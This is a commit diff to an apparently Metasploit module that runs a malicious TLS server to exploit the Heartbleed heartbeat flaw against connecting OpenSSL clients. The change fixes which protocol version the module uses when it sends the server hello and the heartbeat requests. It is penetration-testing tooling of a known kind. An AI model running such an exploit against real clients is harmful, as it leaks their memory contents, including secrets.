Use the protocol version from the handshake

rcvalle · rcvalle · commit fd232b1acd61 · 2014-04-25T01:48:17.000-03:00
I used the protocol version from the record layer thinking I was using the protocol version from the handshake. This commit fix this and uses the protocol version from the handshake instead of from the record layer as in https://gist.github.com/rcvalle/10335282, which is how it should have been initially. Thanks to @wvu-r7 for finding this out!
diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@@ -128,7 +128,7 @@ def process_request(c)
 
   # Process cleartext TLS messages
   def process_openssl_cleartext_request(c, data)
-    message_type, message_version = data.unpack("Cn")
+    message_type, message_version, protocol_version = data.unpack("Cn@9n")
 
     if message_type == 0x15 and data.length >= 7
       message_level, message_reason = data[5,2].unpack("CC")
@@ -165,7 +165,7 @@ def process_openssl_cleartext_request(c, data)
       @state[c][:received_hello] = true
 
       print_status("#{@state[c][:name]} Sending Server Hello...")
-      openssl_send_server_hello(c, data, message_version)
+      openssl_send_server_hello(c, data, protocol_version)
       return
     end
 
@@ -196,7 +196,7 @@ def process_openssl_cleartext_request(c, data)
     else
       # Send heartbeat requests
       if @state[c][:heartbeats].length < heartbeat_limit
-        openssl_send_heartbeat(c, message_version)
+        openssl_send_heartbeat(c, protocol_version)
       end
 
       # Process cleartext heartbeat replies
@@ -216,7 +216,7 @@ def process_openssl_cleartext_request(c, data)
 
   # Process encrypted TLS messages
   def process_openssl_encrypted_request(c, data)
-    message_type, message_version = data.unpack("Cn")
+    message_type, message_version, protocol_version = data.unpack("Cn@9n")
 
     return if @state[c][:shutdown]
     return unless data.length > 5
@@ -237,7 +237,7 @@ def process_openssl_encrypted_request(c, data)
 
     # Send heartbeat requests
     if @state[c][:heartbeats].length < heartbeat_limit
-      openssl_send_heartbeat(c, message_version)
+      openssl_send_heartbeat(c, protocol_version)
     end
 
     # Process heartbeat replies
